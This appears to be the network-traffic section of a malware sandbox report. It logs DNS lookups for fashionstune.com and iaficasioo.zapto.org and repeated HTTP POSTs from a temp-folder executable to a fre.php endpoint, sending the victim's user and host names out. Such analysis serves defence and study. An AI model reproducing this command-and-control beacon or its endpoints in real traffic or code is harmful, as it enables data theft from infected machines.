May 3, 2018 10:13:28.639204025 CEST	49242	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:28.639230013 CEST	80	49242	103.48.119.225	192.168.1.16
May 3, 2018 10:13:28.850507021 CEST	54639	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:28.927644968 CEST	53	54639	8.8.8.8	192.168.1.16
May 3, 2018 10:13:28.929366112 CEST	49243	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:28.929425001 CEST	80	49243	103.48.119.225	192.168.1.16
May 3, 2018 10:13:28.929502010 CEST	49243	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:28.932188988 CEST	49243	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:28.932218075 CEST	80	49243	103.48.119.225	192.168.1.16
May 3, 2018 10:13:28.932378054 CEST	49243	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:28.932399035 CEST	80	49243	103.48.119.225	192.168.1.16
May 3, 2018 10:13:29.397347927 CEST	80	49243	103.48.119.225	192.168.1.16
May 3, 2018 10:13:29.397397995 CEST	80	49243	103.48.119.225	192.168.1.16
May 3, 2018 10:13:29.397588968 CEST	49243	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:29.404588938 CEST	49243	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:29.404630899 CEST	80	49243	103.48.119.225	192.168.1.16
May 3, 2018 10:13:29.660031080 CEST	60543	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:29.735306978 CEST	53	60543	8.8.8.8	192.168.1.16
May 3, 2018 10:13:29.740869999 CEST	49246	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:29.740968943 CEST	80	49246	103.48.119.225	192.168.1.16
May 3, 2018 10:13:29.743269920 CEST	49246	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:29.746505976 CEST	49246	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:29.746551991 CEST	80	49246	103.48.119.225	192.168.1.16
May 3, 2018 10:13:29.747193098 CEST	49246	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:29.747219086 CEST	80	49246	103.48.119.225	192.168.1.16
May 3, 2018 10:13:30.249497890 CEST	80	49246	103.48.119.225	192.168.1.16
May 3, 2018 10:13:30.249545097 CEST	80	49246	103.48.119.225	192.168.1.16
May 3, 2018 10:13:30.249895096 CEST	49246	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:30.250000954 CEST	49246	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:30.250024080 CEST	80	49246	103.48.119.225	192.168.1.16
May 3, 2018 10:13:30.571387053 CEST	63250	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:30.621185064 CEST	53	63250	8.8.8.8	192.168.1.16
May 3, 2018 10:13:30.625950098 CEST	49248	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:30.626059055 CEST	80	49248	103.48.119.225	192.168.1.16
May 3, 2018 10:13:30.627321959 CEST	49248	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:30.630881071 CEST	49248	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:30.630937099 CEST	80	49248	103.48.119.225	192.168.1.16
May 3, 2018 10:13:30.631962061 CEST	49248	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:30.631989956 CEST	80	49248	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.047708035 CEST	80	49248	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.047753096 CEST	80	49248	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.047895908 CEST	49248	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.048019886 CEST	49248	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.048047066 CEST	80	49248	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.228686094 CEST	51945	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:31.290106058 CEST	53	51945	8.8.8.8	192.168.1.16
May 3, 2018 10:13:31.292037010 CEST	49249	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.292082071 CEST	80	49249	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.292184114 CEST	49249	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.294576883 CEST	49249	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.294600964 CEST	80	49249	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.295552969 CEST	49249	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.295569897 CEST	80	49249	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.711811066 CEST	80	49249	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.711877108 CEST	80	49249	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.712007046 CEST	49249	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.712127924 CEST	49249	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.712157965 CEST	80	49249	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.890201092 CEST	52046	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:31.965322018 CEST	53	52046	8.8.8.8	192.168.1.16
May 3, 2018 10:13:31.968972921 CEST	49250	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.969058037 CEST	80	49250	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.969160080 CEST	49250	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.971503973 CEST	49250	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.971549034 CEST	80	49250	103.48.119.225	192.168.1.16
May 3, 2018 10:13:31.973048925 CEST	49250	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:31.973072052 CEST	80	49250	103.48.119.225	192.168.1.16
May 3, 2018 10:13:32.130769968 CEST	53407	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:32.241172075 CEST	53	53407	8.8.8.8	192.168.1.16
May 3, 2018 10:13:32.436606884 CEST	80	49250	103.48.119.225	192.168.1.16
May 3, 2018 10:13:32.436661959 CEST	80	49250	103.48.119.225	192.168.1.16
May 3, 2018 10:13:32.436981916 CEST	49250	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:32.438285112 CEST	49250	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:32.438323021 CEST	80	49250	103.48.119.225	192.168.1.16
May 3, 2018 10:13:32.637113094 CEST	62951	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:32.700378895 CEST	53	62951	8.8.8.8	192.168.1.16
May 3, 2018 10:13:32.701040983 CEST	49253	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:32.701106071 CEST	80	49253	103.48.119.225	192.168.1.16
May 3, 2018 10:13:32.701165915 CEST	49253	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:32.702934027 CEST	49253	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:32.702955961 CEST	80	49253	103.48.119.225	192.168.1.16
May 3, 2018 10:13:32.703063011 CEST	49253	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:32.703078985 CEST	80	49253	103.48.119.225	192.168.1.16
May 3, 2018 10:13:33.168447971 CEST	80	49253	103.48.119.225	192.168.1.16
May 3, 2018 10:13:33.168493986 CEST	80	49253	103.48.119.225	192.168.1.16
May 3, 2018 10:13:33.168642044 CEST	49253	80	192.168.1.16	103.48.119.225
May 3, 2018 10:13:33.168680906 CEST	80	49253	103.48.119.225	192.168.1.16
May 3, 2018 10:13:33.371037006 CEST	80	49253	103.48.119.225	192.168.1.16
May 3, 2018 10:13:33.371121883 CEST	49253	80	192.168.1.16	103.48.119.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2018 10:12:05.531501055 CEST	56975	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:05.702929974 CEST	53	56975	8.8.8.8	192.168.1.16
May 3, 2018 10:12:07.313976049 CEST	51208	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:07.372764111 CEST	53	51208	8.8.8.8	192.168.1.16
May 3, 2018 10:12:07.962960958 CEST	62228	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:08.021006107 CEST	53	62228	8.8.8.8	192.168.1.16
May 3, 2018 10:12:08.945067883 CEST	58659	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:08.986628056 CEST	53	58659	8.8.8.8	192.168.1.16
May 3, 2018 10:12:10.685651064 CEST	56917	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:10.750026941 CEST	53	56917	8.8.8.8	192.168.1.16
May 3, 2018 10:12:11.820586920 CEST	64970	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:11.868490934 CEST	53	64970	8.8.8.8	192.168.1.16
May 3, 2018 10:12:12.529484034 CEST	54618	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:12.594268084 CEST	53	54618	8.8.8.8	192.168.1.16
May 3, 2018 10:12:13.223141909 CEST	62396	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:13.272517920 CEST	53	62396	8.8.8.8	192.168.1.16
May 3, 2018 10:12:34.673579931 CEST	63638	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:34.752717018 CEST	53	63638	8.8.8.8	192.168.1.16
May 3, 2018 10:12:35.427918911 CEST	52877	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:35.488733053 CEST	53	52877	8.8.8.8	192.168.1.16
May 3, 2018 10:12:37.801516056 CEST	59362	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:37.958877087 CEST	53	59362	8.8.8.8	192.168.1.16
May 3, 2018 10:12:57.408991098 CEST	52261	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:57.476808071 CEST	53	52261	8.8.8.8	192.168.1.16
May 3, 2018 10:12:58.231853962 CEST	61585	53	192.168.1.16	8.8.8.8
May 3, 2018 10:12:58.282516956 CEST	53	61585	8.8.8.8	192.168.1.16
May 3, 2018 10:13:00.288141012 CEST	54137	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:00.339117050 CEST	53	54137	8.8.8.8	192.168.1.16
May 3, 2018 10:13:19.432777882 CEST	52165	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:19.481487036 CEST	53	52165	8.8.8.8	192.168.1.16
May 3, 2018 10:13:20.082655907 CEST	52814	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:20.134543896 CEST	53	52814	8.8.8.8	192.168.1.16
May 3, 2018 10:13:20.804007053 CEST	58598	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:20.846155882 CEST	53	58598	8.8.8.8	192.168.1.16
May 3, 2018 10:13:21.448136091 CEST	63099	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:21.489433050 CEST	53	63099	8.8.8.8	192.168.1.16
May 3, 2018 10:13:22.080895901 CEST	56190	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:22.121422052 CEST	53	56190	8.8.8.8	192.168.1.16
May 3, 2018 10:13:22.833748102 CEST	61407	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:22.895598888 CEST	53	61407	8.8.8.8	192.168.1.16
May 3, 2018 10:13:23.528172970 CEST	58098	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:23.597651958 CEST	53	58098	8.8.8.8	192.168.1.16
May 3, 2018 10:13:24.211774111 CEST	63129	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:24.248944998 CEST	53	63129	8.8.8.8	192.168.1.16
May 3, 2018 10:13:24.855376959 CEST	51283	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:24.903155088 CEST	53	51283	8.8.8.8	192.168.1.16
May 3, 2018 10:13:25.562110901 CEST	65348	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:25.610450029 CEST	53	65348	8.8.8.8	192.168.1.16
May 3, 2018 10:13:26.273636103 CEST	64405	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:26.326611042 CEST	53	64405	8.8.8.8	192.168.1.16
May 3, 2018 10:13:26.976149082 CEST	52216	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:27.036655903 CEST	53	52216	8.8.8.8	192.168.1.16
May 3, 2018 10:13:28.147000074 CEST	50621	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:28.213378906 CEST	53	50621	8.8.8.8	192.168.1.16
May 3, 2018 10:13:28.850507021 CEST	54639	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:28.927644968 CEST	53	54639	8.8.8.8	192.168.1.16
May 3, 2018 10:13:29.660031080 CEST	60543	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:29.735306978 CEST	53	60543	8.8.8.8	192.168.1.16
May 3, 2018 10:13:30.571387053 CEST	63250	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:30.621185064 CEST	53	63250	8.8.8.8	192.168.1.16
May 3, 2018 10:13:31.228686094 CEST	51945	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:31.290106058 CEST	53	51945	8.8.8.8	192.168.1.16
May 3, 2018 10:13:31.890201092 CEST	52046	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:31.965322018 CEST	53	52046	8.8.8.8	192.168.1.16
May 3, 2018 10:13:32.130769968 CEST	53407	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:32.241172075 CEST	53	53407	8.8.8.8	192.168.1.16
May 3, 2018 10:13:32.637113094 CEST	62951	53	192.168.1.16	8.8.8.8
May 3, 2018 10:13:32.700378895 CEST	53	62951	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 3, 2018 10:12:05.531501055 CEST	192.168.1.16	8.8.8.8	0x7514	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:12:07.313976049 CEST	192.168.1.16	8.8.8.8	0xbdec	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:12:07.962960958 CEST	192.168.1.16	8.8.8.8	0xcea9	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:12:08.945067883 CEST	192.168.1.16	8.8.8.8	0xa1ff	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:12:10.685651064 CEST	192.168.1.16	8.8.8.8	0x7e21	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:12:11.820586920 CEST	192.168.1.16	8.8.8.8	0x1eb5	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:12:12.529484034 CEST	192.168.1.16	8.8.8.8	0x2784	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:12:13.223141909 CEST	192.168.1.16	8.8.8.8	0xbfaf	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:12:34.673579931 CEST	192.168.1.16	8.8.8.8	0xbc48	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:12:35.427918911 CEST	192.168.1.16	8.8.8.8	0x1ee3	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:12:37.801516056 CEST	192.168.1.16	8.8.8.8	0xb9e8	Standard query (0)	iaficasioo.zapto.org	A (IP address)	IN (0x0001)
May 3, 2018 10:12:57.408991098 CEST	192.168.1.16	8.8.8.8	0x239f	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:12:58.231853962 CEST	192.168.1.16	8.8.8.8	0x1f35	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:00.288141012 CEST	192.168.1.16	8.8.8.8	0x496c	Standard query (0)	iaficasioo.zapto.org	A (IP address)	IN (0x0001)
May 3, 2018 10:13:19.432777882 CEST	192.168.1.16	8.8.8.8	0x7726	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:20.082655907 CEST	192.168.1.16	8.8.8.8	0xe4c6	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:20.804007053 CEST	192.168.1.16	8.8.8.8	0x70bb	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:21.448136091 CEST	192.168.1.16	8.8.8.8	0xce1d	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:22.080895901 CEST	192.168.1.16	8.8.8.8	0x2987	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:22.833748102 CEST	192.168.1.16	8.8.8.8	0xb17d	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:23.528172970 CEST	192.168.1.16	8.8.8.8	0x68d6	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:24.211774111 CEST	192.168.1.16	8.8.8.8	0x9baf	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:24.855376959 CEST	192.168.1.16	8.8.8.8	0x2ac2	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:25.562110901 CEST	192.168.1.16	8.8.8.8	0xe055	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:26.273636103 CEST	192.168.1.16	8.8.8.8	0xbba6	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:26.976149082 CEST	192.168.1.16	8.8.8.8	0x49c4	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:28.147000074 CEST	192.168.1.16	8.8.8.8	0x6b50	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:28.850507021 CEST	192.168.1.16	8.8.8.8	0x346	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:29.660031080 CEST	192.168.1.16	8.8.8.8	0x13e3	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:30.571387053 CEST	192.168.1.16	8.8.8.8	0x73a5	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:31.228686094 CEST	192.168.1.16	8.8.8.8	0xd3f8	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:31.890201092 CEST	192.168.1.16	8.8.8.8	0x36b3	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)
May 3, 2018 10:13:32.130769968 CEST	192.168.1.16	8.8.8.8	0x5519	Standard query (0)	iaficasioo.zapto.org	A (IP address)	IN (0x0001)
May 3, 2018 10:13:32.637113094 CEST	192.168.1.16	8.8.8.8	0xa971	Standard query (0)	fashionstune.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
May 3, 2018 10:12:05.702929974 CEST	8.8.8.8	192.168.1.16	0x7514	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:12:07.372764111 CEST	8.8.8.8	192.168.1.16	0xbdec	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:12:08.021006107 CEST	8.8.8.8	192.168.1.16	0xcea9	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:12:08.986628056 CEST	8.8.8.8	192.168.1.16	0xa1ff	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:12:10.750026941 CEST	8.8.8.8	192.168.1.16	0x7e21	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:12:11.868490934 CEST	8.8.8.8	192.168.1.16	0x1eb5	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:12:12.594268084 CEST	8.8.8.8	192.168.1.16	0x2784	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:12:13.272517920 CEST	8.8.8.8	192.168.1.16	0xbfaf	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:12:34.752717018 CEST	8.8.8.8	192.168.1.16	0xbc48	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:12:35.488733053 CEST	8.8.8.8	192.168.1.16	0x1ee3	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:12:37.958877087 CEST	8.8.8.8	192.168.1.16	0xb9e8	No error (0)	iaficasioo.zapto.org	185.208.211.131	A (IP address)	IN (0x0001)
May 3, 2018 10:12:57.476808071 CEST	8.8.8.8	192.168.1.16	0x239f	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:12:58.282516956 CEST	8.8.8.8	192.168.1.16	0x1f35	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:00.339117050 CEST	8.8.8.8	192.168.1.16	0x496c	No error (0)	iaficasioo.zapto.org	185.208.211.131	A (IP address)	IN (0x0001)
May 3, 2018 10:13:19.481487036 CEST	8.8.8.8	192.168.1.16	0x7726	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:20.134543896 CEST	8.8.8.8	192.168.1.16	0xe4c6	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:20.846155882 CEST	8.8.8.8	192.168.1.16	0x70bb	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:21.489433050 CEST	8.8.8.8	192.168.1.16	0xce1d	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:22.121422052 CEST	8.8.8.8	192.168.1.16	0x2987	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:22.895598888 CEST	8.8.8.8	192.168.1.16	0xb17d	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:23.597651958 CEST	8.8.8.8	192.168.1.16	0x68d6	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:24.248944998 CEST	8.8.8.8	192.168.1.16	0x9baf	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:24.903155088 CEST	8.8.8.8	192.168.1.16	0x2ac2	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:25.610450029 CEST	8.8.8.8	192.168.1.16	0xe055	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:26.326611042 CEST	8.8.8.8	192.168.1.16	0xbba6	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:27.036655903 CEST	8.8.8.8	192.168.1.16	0x49c4	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:28.213378906 CEST	8.8.8.8	192.168.1.16	0x6b50	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:28.927644968 CEST	8.8.8.8	192.168.1.16	0x346	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:29.735306978 CEST	8.8.8.8	192.168.1.16	0x13e3	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:30.621185064 CEST	8.8.8.8	192.168.1.16	0x73a5	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:31.290106058 CEST	8.8.8.8	192.168.1.16	0xd3f8	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:31.965322018 CEST	8.8.8.8	192.168.1.16	0x36b3	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)
May 3, 2018 10:13:32.241172075 CEST	8.8.8.8	192.168.1.16	0x5519	No error (0)	iaficasioo.zapto.org	185.208.211.131	A (IP address)	IN (0x0001)
May 3, 2018 10:13:32.700378895 CEST	8.8.8.8	192.168.1.16	0xa971	No error (0)	fashionstune.com	103.48.119.225	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

fashionstune.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.16	49188	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:12:05.729263067 CEST	0	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 186 Connection: close
May 3, 2018 10:12:05.729406118 CEST	0	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: 'ckav.ruluketaylor688098admin-PCk0C7379241760F18F4D05EC3BEdqd9j
May 3, 2018 10:12:06.334458113 CEST	1	IN	HTTP/1.0 404 Not Found Content-Type: text/html; charset=UTF-8 Content-Length: 15 Date: Thu, 03 May 2018 08:12:05 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.1.16	49189	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:12:07.377966881 CEST	2	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 186 Connection: close
May 3, 2018 10:12:07.378128052 CEST	2	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: 'ckav.ruluketaylor688098admin-PC+0C7379241760F18F4D05EC3BEv5gHb
May 3, 2018 10:12:07.797444105 CEST	2	IN	HTTP/1.0 404 Not Found Content-Type: text/html; charset=UTF-8 Content-Length: 15 Date: Thu, 03 May 2018 08:12:07 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.1.16	49224	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:20.192783117 CEST	27	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:20.192995071 CEST	27	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
May 3, 2018 10:13:20.598864079 CEST	27	IN	HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 23 Date: Thu, 03 May 2018 08:13:20 GMT Accept-Ranges: bytes Server: LiteSpeed Vary: User-Agent Connection: close Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.1.16	49225	103.48.119.225	80	C:\Users\user\AppData\Local\Temp\358saxio.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2018 10:13:20.853152990 CEST	28	OUT	POST /old/inc/img/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: fashionstune.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F85E9006 Content-Length: 159 Connection: close
May 3, 2018 10:13:20.853368998 CEST	28	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 14 00 00 00 6c 00 75 00 6b 00 65 00 74 00 61 00 79 00 6c 00 6f 00 72 00 01 00 0c 00 00 00 36 00 38 00 38 00 30 00 39 00 38 00 01 00 10 00 00 00 61 00 64 00 6d 00 69 00 6e 00 2d 00 50 00 43 Data Ascii: (ckav.ruluketaylor688098admin-PC0C7379241760F18F4D05EC3BE
